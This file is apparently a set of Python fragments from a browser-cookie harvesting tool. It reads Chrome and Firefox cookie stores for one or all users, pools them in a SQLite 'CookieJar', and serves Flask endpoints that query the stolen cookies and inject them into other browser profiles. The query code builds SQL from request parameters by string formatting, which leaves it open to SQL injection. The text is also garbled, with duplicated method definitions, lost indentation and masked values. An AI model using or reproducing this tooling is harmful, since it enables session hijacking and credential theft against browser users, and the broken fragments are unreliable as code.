def grab(self, user, profile=None, rc=False):
profiles = [profile] if profile is not None else self.getProfiles(user)
cookies=[]
for p in profiles:
for c in selectAllFrom(self.cookieTrail%(user,p), "cookies"):
if rc:
cookies.append(Cookie(c['host_key'],c['host_key'],c['name'],c['value'], 'chrome', '%s:%s'%(user,p), c['last_access_utc'],c['creation_utc']))
else:
cookies.append(c)
return cookies
def grab(self, user, profile=None, rc=False):
profiles = [profile] if profile is not None else self.getProfiles(user)
cookies=[]
for p in profiles:
for c in selectAllFrom(self.cookieTrail%(user,p), "moz_cookies"):
if rc:
cookies.append(Cookie(c['basedomain'], c['host'], c['name'], c['value'], 'firefox', '%s:%s'%(user,p), c['lastaccessed'], c['creationtime']))
else:
cookies.append(c)
return cookies
def grabAndStore(self, database=None, allUsers=False, users=None):
path = database if database else "../CookieJar.sqlite"
if not users or type(users) is not list:
users=getUsers() if allUsers else [getpass.getuser()]
grabJar(path)
cookies=selectAllFrom(path, "CookieJar")
if self.args.v: print("Starting with Google Chrome Cookies")
for u in users:
if self.args.v: print(" |- Grabbing cookies of %s"%u)
for p in self.getProfiles(u):
if not os.path.isfile(self.cookieTrail%(u,p)):
if args.v: print(" | | -> Profile %s does not have cookies"%p)
continue
if self.args.v: print(" | |- Grabbing cookies of profile %s"%p)
added=addToJar(path, [Cookie(c['host_key'],c['host_key'],c['name'],c['value'], 'chrome', '%s:%s'%(u,p), webkit_to_epoch(c['last_access_utc']),webkit_to_epoch(c['creation_utc'])) for c in self.grab(u,p)])
if self.args.v: print(" | | -> Stored %s new cookies"%added)
def _query():
domain= request.args.get('domain', type=str).strip()
name= request.args.get('name', type=str).strip()
id= request.args.get('id', type=str).strip()
value= request.args.get('value', type=str).strip()
browser=request.args.get('browser', type=str).strip()
user= request.args.get('user', type=str).strip()
where = []
if domain: where.append('domain="%s"'%domain)
if name: where.append('name="%s"'%name)
if id: where.append('id="%s"'%id)
if value: where.append('value="%s"'%value)
if browser: where.append('browser="%s"'%browser)
if user: where.append('user="******"'%user)
results=selectAllFrom(info['db'], 'CookieJar', where)
for x in results:
x['timejarred'] =toDate(x['timejarred'])
x['lastused'] =toDate(x['lastused'])
x['creationtime']=toDate(x['creationtime'])
return jsonify({"results":results})
def _inject():
items=request.args.get('inject', type=str).split(",")
cookies=request.args.get('cookies', type=str).split(",")
c=[selectAllFrom(info['db'], 'CookieJar', ['id=%s'%x]) for x in cookies]
c=[Cookie(x[0]['domain'], x[0]['host'], x[0]['name'], x[0]['value'], x[0]['browser'], x[0]['user'], x[0]['lastused'], x[0]['creationtime']) for x in c]
success=[]
failed=[]
for x in items:
ex=x.replace("chk:","")
ex.replace("|", " > ")
try:
xs=x.split('|')
if len(xs)>0: xs[0]=xs[0].replace("chk:","")
if len(xs)==3: grabbers[xs[1]].inject(c, xs[0], xs[2])
elif len(xs)==2: grabbers[xs[1]].inject(c, xs[0])
elif len(xs)==1:
for g in grabbers:
grabbers[g].inject(c, xs[0])
success.append(ex)
except Exception as e:
print(e)
failed.append("%s: %s"%(ex,e))
if len(failed)>0: return jsonify({"inject":"failure", "success":success, "failed":failed})
else: return jsonify({"inject":"success", "success":success})
def inject():
c=selectAllFrom(info['db'], 'CookieJar')
return render_template("inject.html", cookies=c ,info=info, grabable=grabable())
def query():
c=selectAllFrom(info['db'], 'CookieJar')
return render_template("query.html", cookies=c ,info=info)
# Main
if __name__=='__main__':
description='''Queries the database for cookies matching criteria'''
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-s', action='store_true', help='Display stats')
parser.add_argument('-d', metavar='domain', help='Domain to query cookies from (e.g github.com)')
parser.add_argument('-b', metavar='browser', help='Browser the cookie was grabbed from (e.g firefox)')
parser.add_argument('-n', metavar='name', help='Cookie name')
parser.add_argument('-v', metavar='value', help='Cookie value')
parser.add_argument('-u', metavar='user', help='User:profile the cookies originate from (e.g NorthernSec:12345ua0.default)')
parser.add_argument('-id', metavar='id', help='ID of stored cookie')
parser.add_argument('db', metavar='database', nargs='?', help='Database')
args = parser.parse_args()
where=[]
if args.d: where.append("domain='%s'"%args.d)
if args.b: where.append("browser='%s'"%args.b)
if args.n: where.append("name='%s'"%args.n)
if args.v: where.append("value='%s'"%args.v)
if args.u: where.append("user='******'"%args.u)
if args.id: where.append("id='%s'"%args.id)
db=args.db if args.db else conf.getCookieJar()
print(db)
cookies = selectAllFrom(db, 'CookieJar', where)
print("id | domain | host | name | value | browser | user | lastUsed | creationTime | timeJarred | notes")
for c in cookies:
print("%s | %s | %s | %s | %s | %s | %s | %s | %s | %s | %s"%(c['id'],c['domain'],c['host'],c['name'],c['value'],c['browser'],c['user'],c['lastused'],c['creationtime'],c['timejarred'],c['notes']))
if args.s:
print("Total of %s cookie(s)"%len(cookies))